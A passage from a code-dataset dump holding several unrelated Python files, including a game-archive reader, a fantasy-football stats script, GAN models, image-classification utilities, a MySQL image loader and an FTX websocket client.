\"wb+\") if rom else open(filename, \"wb+\")\n self._last_filename = filename\n self._last_rom = rom\n elif self._last_filename:\n if self._last_rom:\n file = self._last_rom.open(self._last_filename, \"wb+\")\n else:\n file = open(self._last_filename, \"wb+\")\n\n if compressed is None:\n compressed = self._last_compressed\n if compressed:\n file = CompressedIOWrapper(file, double_typed=(compressed == 2))\n\n self.write_stream(file)\n\n # Close file if we opened it here\n if should_close:\n file.close()\n\n def read_stream(self, stream):\n \"\"\"Abstract function used for reading the file data.\"\"\"\n pass\n\n def write_stream(self, stream):\n \"\"\"Abstract function used for writing the file data.\"\"\"\n pass\n\n\nclass PlzArchive(Archive, FileFormat):\n \"\"\"\n A Plz Archive, a file containing other files within, so that they are compressed.\n \"\"\"\n _compressed_default = 1\n\n filenames: List[str] = []\n \"\"\"List of the names of the files present in the plz archive.\"\"\"\n files: List[bytes] = []\n \"\"\"List of the data of the files present in the plz archive.\"\"\"\n\n def read_stream(self, stream):\n if isinstance(stream, BinaryReader):\n rdr = stream\n else:\n rdr = BinaryReader(stream)\n\n self.filenames = []\n self.files = []\n\n header_size = rdr.read_uint32()\n archive_file_size = rdr.read_uint32()\n assert rdr.read(4) == b\"PCK2\"\n rdr.seek(header_size)\n\n while rdr.c < archive_file_size:\n start_pos = rdr.c\n\n file_header_size = rdr.read_uint32()\n file_total_size = rdr.read_uint32()\n rdr.seek(4, io.SEEK_CUR)\n file_size = rdr.read_uint32()\n\n filename = rdr.read_string(encoding=\"shift-jis\")\n\n rdr.seek(start_pos + file_header_size)\n file = rdr.read(file_size)\n rdr.seek(start_pos + file_total_size)\n\n self.filenames.append(filename)\n self.files.append(file)\n\n def write_stream(self, stream):\n if isinstance(stream, BinaryWriter):\n wtr = stream\n else:\n wtr = BinaryWriter(stream)\n\n wtr.write_uint32(16)\n wtr.write_uint32(0) # placeholder file_size\n wtr.write(b\"PCK2\")\n wtr.write_uint32(0)\n\n for i in range(len(self.files)):\n header_size = 16 + len(self.filenames[i]) + 1\n header_size += 4 - header_size % 4\n\n total_size = header_size + len(self.files[i])\n total_size += 4 - total_size % 4\n c = wtr.c\n wtr.write_uint32(header_size)\n wtr.write_uint32(total_size)\n wtr.write_uint32(0)\n wtr.write_uint32(len(self.files[i]))\n\n wtr.write_string(self.filenames[i])\n wtr.seek(c + header_size)\n wtr.write(self.files[i])\n # Seek while adding bytes\n while wtr.c != c + total_size:\n wtr.write_uint8(0)\n\n file_size = len(wtr)\n wtr.seek(4)\n wtr.write_uint32(file_size)\n\n def open(self, file: Union[AnyStr, int], mode: str = \"rb\") -> Union[io.BytesIO, io.TextIOWrapper]:\n match = re.findall(r\"^([rwa])(b?)(\\+?)$\", mode)\n if not match:\n raise ValueError(f\"invalid mode: '{mode}'\")\n create = False\n text = True\n if match:\n if match[0][1] == \"b\":\n text = False\n if match[0][2] == \"+\":\n create = True\n\n if isinstance(file, int):\n fileid = file\n else:\n try:\n fileid = self.filenames.index(file)\n except ValueError:\n fileid = None\n if fileid is None and create:\n fileid = self.add_file(file)\n if not fileid:\n raise FileNotFoundError(f\"file '{file}' could not be opened nor created\")\n if fileid is None:\n raise FileNotFoundError(f\"file '{file}' could not be opened\")\n\n rom_file = RomFile(self, fileid, match[0][0])\n if text:\n return io.TextIOWrapper(rom_file)\n return rom_file\n\n def add_file(self, filename: str):\n new_file_id = len(self.files)\n self.files.append(b\"\")\n self.filenames.append(filename)\n\n return new_file_id\n\n def remove_file(self, filename: str):\n if filename not in self.filenames:\n return\n index = self.filenames.index(filename)\n self.files.pop(index)\n self.filenames.pop(index)\n\n def rename_file(self, old_filename, new_filename):\n if old_filename not in self.filenames:\n return\n index = self.filenames.index(old_filename)\n self.filenames[index] = new_filename\n","repo_name":"C3RV1/LaytonEditor","sub_path":"formats/filesystem.py","file_name":"filesystem.py","file_ext":"py","file_size_in_byte":18514,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"78"} +{"seq_id":"3354015029","text":"import json\nimport utils\nimport os\nimport os.path\nfrom datetime import timedelta, datetime\nfrom sleeper_wrapper import League, User, Players, Stats\n\n\ndef resource_needs_update(path):\n five_days_ago = datetime.timestamp(datetime.now() - timedelta(days=5))\n ctime = os.path.getctime(path)\n if ctime < five_days_ago:\n return True\n else:\n return False\n\n\ndef update_players(path):\n print(\"Updating players.\")\n p = Players()\n players = p.get_all_players()\n # resp_data = json.loads(resp.json())\n with open(path, 'w') as outfile:\n json.dump(players, outfile, indent=2)\n return players\n\n\ndef update_stats(path, week):\n print(\"Updating stats.\")\n s = Stats()\n curr_stats = s.get_week_stats('regular', config['seasonYear'], week)\n with open(path, 'w') as outfile:\n json.dump(curr_stats, outfile, indent=2)\n outfile.close()\n return curr_stats\n\n\ndef update_projections(path, week):\n print(\"Updating Projections.\")\n s = Stats()\n curr_projections = s.get_week_projections('regular', config['seasonYear'], week)\n with open(path, 'w') as outfile:\n json.dump(curr_projections, outfile, indent=2)\n outfile.close()\n return curr_projections\n\n\ndef get_users():\n raw_users = league.get_users()\n raw_rosters = league.get_rosters()\n\n users = {}\n for user in raw_users:\n users[user[\"user_id\"]] = {\n \"user_id\": user[\"user_id\"],\n \"display_name\": user['display_name']\n }\n if user['metadata'].get('team_name'):\n users[user[\"user_id\"]][\"team_name\"] = user['metadata']['team_name']\n else:\n users[user[\"user_id\"]][\"team_name\"] = \"Team\" + user['display_name']\n for roster in raw_rosters:\n users[roster['owner_id']]['current_starters'] = roster['starters']\n users[roster['owner_id']]['current_roster'] = roster['players']\n users[roster['owner_id']]['current_reserves'] = roster['reserve']\n users[roster['owner_id']]['roster_id'] = roster['roster_id']\n users[roster['owner_id']]['standings'] = {\n 'wins': roster['settings']['wins'],\n 'losses': roster['settings']['losses'],\n 'ties': roster['settings']['ties'],\n 'fpts': float(str(roster['settings']['fpts']) + '.' + str(roster['settings']['fpts_decimal'])),\n 'ppts': float(str(roster['settings']['ppts']) + '.' + str(roster['settings']['ppts_decimal'])),\n 'fpts_against': float(str(roster['settings']['fpts_against']) + '.' + str(roster['settings']['fpts_against_decimal'])),\n 'waiver_budget_used': roster['settings']['waiver_budget_used']\n }\n w1m = league.get_matchups(1)\n print(users)\n\n\ndef get_players():\n players_path = 'resources/players.json'\n if os.path.exists(players_path):\n with open(players_path) as players_file:\n try:\n if not resource_needs_update(players_path):\n return json.load(players_file)\n else:\n return update_players(players_path)\n except:\n print(\"Error handling players.json file\")\n else:\n print(\"No players json found. Gathering new one.\")\n return update_players(players_path)\n\n\n\ndef get_stats_and_projections():\n all_weeks = range(1, int(config['seasonWeek']) + 1)\n all_weeks_stats = []\n all_weeks_projections = []\n for week in all_weeks:\n week = str(week)\n stats_path = 'resources/stats/' + week + '.json'\n projections_path = 'resources/projections/' + week + '.json'\n if os.path.exists(stats_path):\n with open(stats_path) as week_stats:\n try:\n all_weeks_stats.append(json.load(week_stats))\n except:\n print(\"Error handling \" + stats_path + \" file.\")\n week_stats.close()\n else:\n print(\"No stats json found for week \" + week + \".\")\n all_weeks_stats.append(update_stats(stats_path, week))\n\n if os.path.exists(projections_path):\n with open(projections_path) as week_projections:\n try:\n all_weeks_projections.append(json.load(week_projections))\n except:\n print(\"Error handling \" + projections_path + \" file.\")\n week_projections.close()\n else:\n print(\"No projections json found for week \" + str(week) + \".\")\n all_weeks_projections.append(update_projections(projections_path, week))\n return all_weeks_stats, all_weeks_projections\n\n\ndef get_stats_projections_and_diff_for_player(player_id, scoring_settings):\n stats = Stats()\n player_pts_by_week = {}\n\n for week in all_weeks_stats:\n player_week_stats = stats.get_player_week_stats(week, player_id)\n player_pts_by_week[week[0]['week']] = {\n \"stats\": {},\n \"projections\": {}\n }\n if player_week_stats is not None:\n pts = utils.calculate_points(scoring_settings, player_week_stats['stats'])\n player_pts_by_week[week[0]['week']]['stats'] = round(pts, 2)\n else:\n player_pts_by_week[week[0]['week']]['stats'] = 'BYE'\n\n for week in all_weeks_projections:\n player_week_projections = stats.get_player_week_projections(week, player_id)\n if player_week_projections is not None:\n pts = utils.calculate_points(scoring_settings, player_week_projections['stats'])\n player_pts_by_week[week[0]['week']]['projections'] = round(pts, 2)\n else:\n player_pts_by_week[week[0]['week']]['projections'] = 'BYE'\n\n for week, stats in player_pts_by_week.items():\n if stats['stats'] != 'BYE':\n player_pts_by_week[week][\"difference\"] = round(\n float(player_pts_by_week[week]['stats']) - float(player_pts_by_week[week]['projections']), 2)\n\n return player_pts_by_week\n\n\n\"\"\"\nMAIN CODE HERE\n\"\"\"\n\nwith open('config.json') as config_file:\n config = json.load(config_file)\n\nleague = League(config['leagueId'])\nscoring_settings = league.get_scoring_settings()\nusers = league.get_users()\nrosters = league.get_rosters()\n\nget_users()\nall_weeks_stats, all_weeks_projections = get_stats_and_projections()\nplayers = get_players()\n\n\ns_p = get_stats_projections_and_diff_for_player(utils.search_for_player_by_name(players, 'D.J. Chark')['player_id'], scoring_settings)\n\nutils.pprint(s_p)\n# utils.pprint(player_pts_by_week)\n#utils.pprint(players['96'])\n","repo_name":"sdcalmes/MySleeperStats","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"325852569","text":"import torch\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport torch.autograd as autograd\nimport torch.optim as optim\nimport numpy as np\nimport pandas as pd\nimport os\nfrom torch.autograd import Variable\n\ndef mask_operate(data, mask, col_ind):\n\tresult = []\n\tfor i in range(mask.shape[1]):\n\t\tsta = col_ind[i][0]\n\t\tend = col_ind[i][1]\n\t\t#data[:, sta:end] = data[:, sta:end]*mask[:, i:i+1]\n\t\tresult.append(data[:, sta:end]*mask[:, i:i+1])\n\tresult = torch.cat(result, dim = 1)\n\treturn result\n\nclass MaskGenerator_MLP(nn.Module):\n\tdef __init__(self, z_dim, data_dim, hidden_dims, mask_dim):\n\t\tsuper(MaskGenerator_MLP, self).__init__()\n\t\tdim = z_dim+data_dim\n\t\tseq = []\n\t\tfor item in list(hidden_dims):\n\t\t\tfc = nn.Linear(dim, item)\n\t\t\tnn.init.xavier_normal_(fc.weight)\n\t\t\tseq += [\n\t\t\t\tfc,\n\t\t\t\tnn.BatchNorm1d(item),\n\t\t\t\tnn.Dropout(0.5),\n\t\t\t\tnn.LeakyReLU()\n\t\t\t]\n\t\t\tdim = item\n\t\tseq += [nn.Linear(dim, mask_dim)]\n\t\tnn.init.xavier_normal_(seq[-1].weight)\n\t\tself.net = nn.Sequential(*seq)\n\n\tdef forward(self, z, x):\n\t\tz = torch.cat((z,x),dim=1)\n\t\tm = self.net(z)\n\t\tm = torch.sigmoid(m)\n\t\treturn m\n\n\nclass ObservedGenerator_MLP(nn.Module):\n\tdef __init__(self, z_dim, hidden_dims, x_dim, mask_dim, col_type, col_ind):\n\t\tsuper(ObservedGenerator_MLP, self).__init__()\n\t\tself.col_type = col_type\n\t\tself.col_ind = col_ind\n\t\tdim = z_dim + x_dim + mask_dim\n\t\tseq = []\n\t\tfor item in list(hidden_dims):\n\t\t\tfc = nn.Linear(dim, item)\n\t\t\tnn.init.xavier_normal_(fc.weight)\n\t\t\tseq += [\n\t\t\t\tfc,\n\t\t\t\tnn.BatchNorm1d(item),\n\t\t\t\tnn.Dropout(0.5),\n\t\t\t\tnn.ReLU()\n\t\t\t]\n\t\t\tdim = item\n\t\tseq += [nn.Linear(dim, x_dim)]\n\t\tnn.init.xavier_normal_(seq[-1].weight)\n\t\tself.net = nn.Sequential(*seq)\n\n\tdef forward(self, z, x, m):\n\t\tinput = torch.cat((z, x, m), dim = 1)\n\t\tdata = self.net(input)\n\t\toutput = []\n\t\tfor i in range(len(self.col_type)):\n\t\t\tsta = self.col_ind[i][0]\n\t\t\tend = self.col_ind[i][1]\n\t\t\tif self.col_type[i] == 'condition':\n\t\t\t\tcontinue\n\t\t\tif self.col_type[i] == 'normalize':\n\t\t\t\ttemp = torch.tanh(data[:,sta:end])\n\t\t\telif self.col_type[i] == 'one-hot':\n\t\t\t\ttemp = torch.softmax(data[:,sta:end], dim=1)\n\t\t\telif self.col_type[i] == 'gmm':\n\t\t\t\ttemp1 = torch.tanh(data[:,sta:sta+1])\n\t\t\t\ttemp2 = torch.softmax(data[:,sta+1:end], dim=1)\n\t\t\t\ttemp = torch.cat((temp1,temp2),dim=1)\n\t\t\telif self.col_type[i] == 'ordinal':\n\t\t\t\ttemp = torch.sigmoid(data[:,sta:end])\n\t\t\toutput.append(temp)\n\t\toutput = torch.cat(output, dim = 1)\n\t\treturn output\n\nclass ObservedGenerator_LSTM(nn.Module):\n\tdef __init__(self, z_dim, feature_dim, lstm_dim, col_dim, col_type, col_ind, x_dim, mask_dim):\n\t\tsuper(ObservedGenerator_LSTM, self).__init__()\n\t\tself.x_dim = x_dim\n\t\tself.mask_dim = mask_dim\n\t\tself.l_dim = lstm_dim\n\t\tself.f_dim = feature_dim\n\t\tself.col_dim = col_dim\n\t\tself.col_ind = col_ind\n\t\tself.col_type = col_type\n\t\tself.GPU = False\n\t\tself.LSTM = nn.LSTMCell(z_dim+x_dim+mask_dim+feature_dim, lstm_dim) # input (fx, z, attention), output(hx, cx)\n\t\tself.FC = {}\t # FullyConnect layers for every columns \n\t\tself.Feature = {}\n\t\tself.go = nn.Parameter(torch.randn(1, self.f_dim))\n\t\tfor i in range(len(col_type)):\n\t\t\tif col_type[i] == \"condition\":\n\t\t\t\tcontinue\n\t\t\tif col_type[i] == \"gmm\":\n\t\t\t\tself.FC[i] = []\n\t\t\t\tfc1 = nn.Linear(feature_dim, 1)\n\t\t\t\tsetattr(self, \"gmfc%d0\"%i, fc1)\n\t\t\t\t\n\t\t\t\tfc2 = nn.Linear(feature_dim, col_dim[i] - 1)\n\t\t\t\tsetattr(self, \"gmfc%d1\"%i, fc2)\n\t\t\t\t\n\t\t\t\tfc3 = nn.Linear(col_dim[i] - 1, feature_dim)\n\t\t\t\tsetattr(self, \"gmfc%d2\"%i, fc3)\n\t\t\t\tself.FC[i] = [fc1, fc2, fc3]\n\t\t\t\t\n\t\t\t\tfe1 = nn.Linear(lstm_dim, feature_dim)\n\t\t\t\tsetattr(self, \"gmfe%d0\"%i, fe1)\n\t\t\t\t\n\t\t\t\tfe2 = nn.Linear(lstm_dim, feature_dim)\n\t\t\t\tsetattr(self, \"gmfe%d1\"%i, fe2)\n\t\t\t\tself.Feature[i] = [fe1, fe2]\n\t\t\telse:\n\t\t\t\tfc1 = nn.Linear(feature_dim, col_dim[i])\n\t\t\t\tsetattr(self, \"fc%d0\"%i, fc1)\n\t\t\t\t\n\t\t\t\tfc2 = nn.Linear(col_dim[i], feature_dim)\n\t\t\t\tsetattr(self, \"fc%d1\"%i, fc2)\n\t\t\t\tself.FC[i] = [fc1, fc2]\n\t\t\t\t\n\t\t\t\tfe = nn.Linear(lstm_dim, feature_dim)\n\t\t\t\tsetattr(self, \"fe%d\"%i, fe)\n\t\t\t\tself.Feature[i] = fe\n\n\tdef forward(self, z, x, m):\n\t\tstates = []\n\t\toutputs = []\n\t\tz = torch.cat((z, x, m),dim=1)\n\t\thx = torch.randn(z.size(0), self.l_dim)\n\t\tcx = torch.randn(z.size(0), self.l_dim)\n\t\tfx = self.go.repeat([z.size(0), 1])\n\t\tif self.GPU:\n\t\t\thx = hx.cuda()\n\t\t\tcx = cx.cuda()\n\t\t\tfx = fx.cuda()\n\t\tinputs = torch.cat((z, fx), dim = 1)\n\t\tfor i in range(len(self.col_type)):\n\t\t\tif self.col_type[i] == \"condition\":\n\t\t\t\tcontinue\n\t\t\tif self.col_type[i] == \"gmm\":\n\t\t\t\thx, cx = self.LSTM(inputs, (hx, cx))\n\t\t\t\tstates.append(hx)\n\t\t\t\tfx = torch.tanh(self.Feature[i][0](hx))\n\t\t\t\tv = torch.tanh(self.FC[i][0](fx))\n\t\t\t\toutputs.append(v)\n\t\t\t\tinputs = torch.cat((z, fx), dim = 1)\n\t\t\t\t\n\t\t\t\thx, cx = self.LSTM(inputs, (hx, cx))\n\t\t\t\tstates.append(hx)\n\t\t\t\tfx = torch.tanh(self.Feature[i][1](hx))\n\t\t\t\tv = self.FC[i][1](fx)\n\t\t\t\tv = torch.softmax(v, dim=1)\n\t\t\t\toutputs.append(v)\n\t\t\t\tfx = torch.tanh(self.FC[i][2](v))\n\t\t\t\tinputs = torch.cat((z, fx), dim = 1)\n\t\t\telse:\n\t\t\t\thx, cx = self.LSTM(inputs, (hx, cx))\n\t\t\t\tstates.append(hx)\n\t\t\t\tfx = self.Feature[i](hx)\n\t\t\t\tv = self.FC[i][0](fx)\n\t\t\t\tif self.col_type[i] == \"normalize\":\n\t\t\t\t\tv = torch.tanh(v)\n\t\t\t\telif self.col_type[i] == \"one-hot\":\n\t\t\t\t\tv = torch.softmax(v, dim = 1)\n\t\t\t\telif self.col_type[i] == \"ordinal\":\n\t\t\t\t\tv = torch.sigmoid(v)\n\t\t\t\toutputs.append(v)\n\t\t\t\tfx = self.FC[i][1](v)\n\t\t\t\tinputs = torch.cat((z, fx), dim = 1)\n\t\ttrue_output = torch.cat(outputs, dim = 1)\n\t\treturn true_output\n\nclass Discriminator(nn.Module):\n\tdef __init__(self, x_dim, hidden_dims, c_dim=0, condition=False):\n\t\tsuper(Discriminator, self).__init__()\n\t\tself.condition = condition\n\t\tdim = x_dim+c_dim\n\t\tseq = []\n\t\tfor item in list(hidden_dims):\n\t\t\tfc = nn.Linear(dim, item)\n\t\t\tnn.init.xavier_normal_(fc.weight)\n\t\t\tseq += [\n\t\t\t\tfc,\n\t\t\t\tnn.BatchNorm1d(item),\n\t\t\t\tnn.Dropout(0.5),\n\t\t\t\tnn.LeakyReLU()\n\t\t\t]\n\t\t\tdim = item\n\t\tseq += [nn.Linear(dim, 1)]\n\t\tnn.init.xavier_normal_(seq[-1].weight)\n\t\tself.net = nn.Sequential(*seq)\n\n\tdef forward(self, x, c=None):\n\t\tif self.condition:\n\t\t\tx = torch.cat((x, c), dim=1)\n\t\ty = self.net(x)\n\t\treturn y\n\n\tdef init_weights(self):\n\t\tpass\n\nclass Noise_Discriminator(nn.Module):\n\tdef __init__(self, x_dim, hidden_dims, mask_dim):\n\t\tsuper(Noise_Discriminator, self).__init__()\n\t\tdim = x_dim\n\t\tseq = []\n\t\tfor item in list(hidden_dims):\n\t\t\tseq += [\n\t\t\t\tnn.Linear(dim, item),\n\t\t\t\tnn.BatchNorm1d(item),\n\t\t\t\tnn.Dropout(0.5),\n\t\t\t\tnn.LeakyReLU()\n\t\t\t]\n\t\t\tdim = item\n\t\tseq += [\n\t\t\tnn.Linear(dim, mask_dim),\n\t\t\tnn.Sigmoid()\n\t\t]\n\t\tself.net = nn.Sequential(*seq)\n\n\tdef forward(self, x):\n\t\ty = self.net(x)\n\t\treturn y\n","repo_name":"ruc-datalab/dagan","sub_path":"code/synthesizer/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6484,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"28760295819","text":"# list1=[10,20,40,60,70,80] sorted list\r\n# list2=[5,15,25,35,45,60] sorted list\r\n# Merge these two sorted lists to produce one sorted list, but use only loop either while or for only one time\r\nlist1=[10,20,40,60,70,80] \r\nlist2=[5,15,25,35,45,60]\r\nlist1.sort()\r\nlist2.sort()\r\n# print(list1,\" \",list2)\r\nres=sorted(list1+list2)\r\nprint(res)","repo_name":"saisahanar/python-letsupgrade-","sub_path":"DAY 5 ASSIGNMENT/q2.py","file_name":"q2.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15251325644","text":"# Script contain base function\n#\n# Author: Robert Kolcun, FIT\n# <xkolcu00@stud.fit.vutbr.cz>\n\nfrom printer import print_error\n\nimport keras.backend as K\nimport argparse\n\n\ndef parse_arguments_training():\n ap = argparse.ArgumentParser()\n ap.add_argument(\n \"--dataset\",\n required=True,\n help=\"path to input data for training\",\n )\n ap.add_argument(\n \"--model\",\n required=True,\n help=\"path where model will be saved\",\n )\n ap.add_argument(\n \"--alg\",\n required=True,\n help=\"type of algorithm for image classification\",\n )\n ap.add_argument(\n \"--ep\",\n required=False,\n help=\"number of epochs\"\n )\n ap.add_argument(\n \"--bs\",\n required=False,\n help=\"batch size\"\n )\n ap.add_argument(\n \"--rt\",\n required=False,\n help=\"rotation type\"\n )\n return vars(ap.parse_args())\n\ndef parse_arguments_prediction():\n ap = argparse.ArgumentParser()\n ap.add_argument(\n \"--class\",\n \"--c\",\n required=True,\n help=\"path to model for weapon classification\"\n )\n ap.add_argument(\n \"--anglep\",\n \"--p\",\n required=True,\n help=\"path to model prediction Pitch axis of weapon angle\"\n )\n ap.add_argument(\n \"--angler\",\n \"--r\",\n required=True,\n help=\"path to model prediction Roll axis of weapon angle\"\n )\n ap.add_argument(\n \"--angley\",\n \"--y\",\n required=True,\n help=\"path to model prediction Yaw axis of weapon angle\"\n )\n ap.add_argument(\n \"--image\",\n \"--i\",\n required=True,\n help=\"path to image for prediction\"\n )\n return vars(ap.parse_args())\n\ndef parse_arguments_evaluation():\n ap = argparse.ArgumentParser()\n ap.add_argument(\n \"--model\",\n required=True,\n help=\"path to folder of trained model\"\n )\n ap.add_argument(\n \"--image\",\n required=False,\n help=\"path to input image\"\n )\n ap.add_argument(\n \"--dataset\",\n required=False,\n help=\"path to input images\"\n )\n ap.add_argument(\n \"--file\",\n required=False,\n help=\"path to file with paths to images\"\n )\n ap.add_argument(\n \"--th\",\n required=False,\n help=\"threshold for angle prediction\"\n )\n return vars(ap.parse_args())\n\ndef angle_error(true_y, pred_y):\n diff = calculate_diff_angle(K.argmax(true_y), K.argmax(pred_y))\n return K.mean(K.cast(K.abs(diff), K.floatx()))\n\ndef calculate_diff_angle(correct_angle, predicted_angle):\n # Calculate diff. angle\n return 180 - abs(abs(correct_angle - predicted_angle) - 180)\n\ndef get_prediction(model_class, image):\n if (len(image.shape) == 3):\n image = image.reshape(image.shape + (1,))\n\n switched_labels = dict((y,x) for x,y in model_class.labels_dict.items())\n result_dict = {}\n for i, value in enumerate(model_class.model.predict(image)[0]):\n result_dict.update({\n switched_labels[i]: round(float(value), 6)\n })\n return result_dict\n\nclass Algorithm():\n\n CNN = 'Convolutial Neural Network'\n CNN_C = CNN + ' class'\n CNN_A = CNN + ' angle'\n MLP = 'Multi Layer Perceptron'\n SVM = 'Super Vector Machine'\n KMEANS = 'K-means Classification'\n\n translate_dict = {\n 'cnnc': CNN_C,\n 'cnna': CNN_A,\n 'mlp': MLP,\n 'svm': SVM,\n 'kmeans': KMEANS,\n }\n\n @classmethod\n def translate(self, in_type):\n try:\n return self.translate_dict[in_type]\n except KeyError:\n print_error('Invalid algorithm type')\n","repo_name":"NoName115/Bachelor-thesis","sub_path":"src/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8505738937","text":"from mysql import connector\nimport base64\nimport glob\nimport random\n\n\n\nBASE_DIR = \"/home/akash/Downloads/Major_Project/structured_images/tops/\"\nimg_paths = glob.glob(BASE_DIR + \"*.jpeg\")\n\nconnection = connector.connect(\n host='192.168.56.101', database='visualsearch', user='user', password='Akash123')\n\ntop_names = [\"ZARA's Exclusive Top\", \"H&M Fancy Wear\", \"Pantaloon's Summer Top\", \"Nykaa Fashion Wear\", \"Levi's Top\"]\ncnt = 0\nfor img_path in img_paths:\n cnt = cnt%5\n image64 = \"\"\n with open(img_path, \"rb\") as img_file:\n image64 = base64.b64encode(img_file.read())\n #print(image64)\n cursor = connection.cursor()\n sql_insert_blob_query = \"\"\" INSERT INTO tops\n (id, image, image_name, price) VALUES (%s,%s,%s,%s)\"\"\"\n\n img_name = top_names[cnt]\n id = img_path.split(\"/\")[-1].split(\".\")[0]\n price = random.randint(100, 10000)\n print(id, img_name)\n insert_blob_tuple = (id, image64, img_name, price)\n result = cursor.execute(sql_insert_blob_query, insert_blob_tuple)\n connection.commit()\n cnt=cnt+1\n\nif connection.is_connected():\n cursor.close()\n connection.close()\n print(\"MySQL connection is closed\")\n","repo_name":"akash11061999/Visual-Search-Recommendation","sub_path":"image-similarity/image-save-mysql.py","file_name":"image-save-mysql.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34825454828","text":"# from gevent import socket\n# import greenlet\n# from threading import activeCount as activeCountThreads\n# def _ordbk_task(self, market: str, delay):\n# \"\"\" Upon update, object FIFO-Queued for safe writes. \"\"\"\n# logging.debug(f'<<< _ORDER_BOOK_TASK({market}, delay=wait()).started(protected) >>>')\n# while self._run_event.is_set():\n# (mkt_ordbk, ordbk_ts) = self.get_orderbook(market=market), self.get_ordbk_ts(market=market)\n# self._write_pool.put([market, mkt_ordbk, ordbk_ts, 'ORDERBOOK'])\n# print(f'-> Orderbook({market}).recv[ <{ordbk_ts}> ]')\n# # time.sleep(2.0)\n# self.wait_for_orderbook_update(market=market, timeout=5.0)\n#\n#\n# def _tick_task(self, market: str, delay: float = 4):\n# logging.debug(f'>>> _TICKERS_TASK(market={market}, delay={delay})')\n# while self._run_event.is_set():\n# (mkt_ticks, tick_ts) = self.get_tickers(market=market), self.get_ticker_ts(market=market)\n# if len(mkt_ticks) > 0:\n# self._write_pool.put([market, mkt_ticks, tick_ts, 'TICKERS'])\n# logging.debug(f'>>> Tickers({market}).recv[<{tick_ts}>]')\n# time.sleep(2)\n#\n#\n# def _trade_task(self, market: str, delay: float = 2):\n# logging.debug(f'>>> _TRADES_TASK(market={market}, delay={delay})')\n# while self._run_event.is_set():\n# (mkt_trades, local_ts) = self.get_trades(market=market), self.get_local_ts()\n# if len(mkt_trades) > 0:\n# self._write_pool.put([market, mkt_trades, local_ts, 'TRADES'])\n# logging.debug(f'>>> Tickers({market}).recv[<{local_ts}>]')\n# time.sleep(2)\nimport json\nfrom threading import enumerate as enumerate_threads\nfrom queue import Queue\nfrom _queue import Empty\nfrom FTX_Ws_Broker import *\n\n\nclass ClientSocket(FtxWebsocketClient):\n \"\"\"\n Create class instance and pass tuple with market names to .heavy_wizard()\n Socket is opened with exchange server, subscription requests sent\n Efficient wait loop for orderbook updates implemented with gevent.Event\n \"\"\"\n def __init__(self):\n \"\"\" All attributes _protected to protect proper synchronization pattern \"\"\"\n super().__init__()\n self._subs_pool = Queue()\n self._write_pool = Queue()\n self._run_event = Event()\n self._thread_pooler = None\n self._set_tasks()\n\n @staticmethod\n def get_local_ts():\n return datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')\n\n def _run_task(self, market: str, channel_handle: str, ftx_task, ftx_ts):\n if channel_handle is 'orderbooks':\n while self._run_event.is_set():\n (channel, timestamp) = ftx_task(market=market), ftx_ts(market=market)\n self._write_pool.put([market, channel, timestamp, channel_handle.upper()])\n self.wait_for_orderbook_update(market=market, timeout=5.0)\n else:\n while self._run_event.is_set():\n (channel, timestamp) = ftx_task(market=market), ftx_ts(market=market)\n self._write_pool.put([market, channel, timestamp, channel_handle.upper()])\n time.sleep(2.0)\n\n def _stream_pooler(self, market: str = None, interval: str = None, channel=(True, False, False)):\n \"\"\" Creates thread tasked with polling XYZ market, FIFO.put for processing \"\"\"\n pools = {\n 'Orderbooks': (self.get_orderbook, self.get_ordbk_ts),\n 'Trades': (self.get_trades, self.get_local_ts),\n 'Tickers': (self.get_tickers, self.get_ticker_ts)\n }\n for channel, streams in pools.items():\n mkt_threader = Thread(\n name=f'{market}{channel}', target=self._run_task,\n args=(market, channel, streams[0], streams[1]))\n mkt_threader.start()\n\n def _subscription_arbiter(self) -> None:\n \"\"\" Gets new subscriptions from _subs_pool queue and starts _sub_market_thread \"\"\"\n while self._run_event.is_set():\n market_name, market_thread = self._subs_pool.get()\n market_thread.start()\n time.sleep(0.5)\n self._subs_pool.task_done()\n self._subs_pool.join()\n\n def _stream_wizard(self, streamers):\n if not self._run_event.is_set():\n self._run_event.set()\n if self._thread_pooler is None:\n self._thread_pooler = Thread(name='_ARBITER', target=self._subscription_arbiter, daemon=True)\n self._thread_pooler.start()\n market_pool = Thread(name='_MARKET_POOL', target=self._stream_pooler, args=(streamers,))\n safe_writes = Thread(name='_WRITE_WIZARD', target=self._write_worker)\n return market_pool, safe_writes\n\n def _write_worker(self):\n raise NotImplementedError()\n\n\nclass WriteUpdates(ClientSocket):\n def __init__(self):\n super().__init__()\n\n def _write_worker(self) -> Any:\n \"\"\"\n TODO raise NotImplementedError() -> inherit attributes to database_handler\n Processes queued items for safe-writes to file.txt\n \"\"\"\n try:\n while True:\n (market, update, update_ts, channel) = self._write_pool.get(timeout=5)\n valid_name = ''.join(['_' if x in '/' else x for x in market]).upper()\n with open(file=f'../temp_storage/{valid_name}_{channel}.txt', mode='a+') as filer:\n filer.writelines(f\"{json.dumps({f'UPDATED[{update_ts}]': update})}\\n\")\n self._write_pool.task_done()\n except Empty:\n logging.debug(f'* SafeWriteQueue.isEmpty(joinQueue=True) *')\n except OSError as ose:\n raise ose\n finally:\n self._write_pool.join()\n\n def stream_wizard(self, streamers: Dict[str, Any]) -> None:\n market_pool, safe_writes = self._stream_wizard(streamers=streamers)\n market_pool.start()\n time.sleep(0.5)\n safe_writes.start()\n try:\n while 1:\n time.sleep(5)\n except KeyboardInterrupt:\n print()\n logging.debug(f'\\n>>> KeyboardInterrupt:[ _TERMINATE_THREAD_POOL ]')\n self._run_event.clear()\n market_pool.join()\n safe_writes.join()\n self.disconnect()\n finally:\n for ti in enumerate_threads():\n print(f'>>> LiveThread: 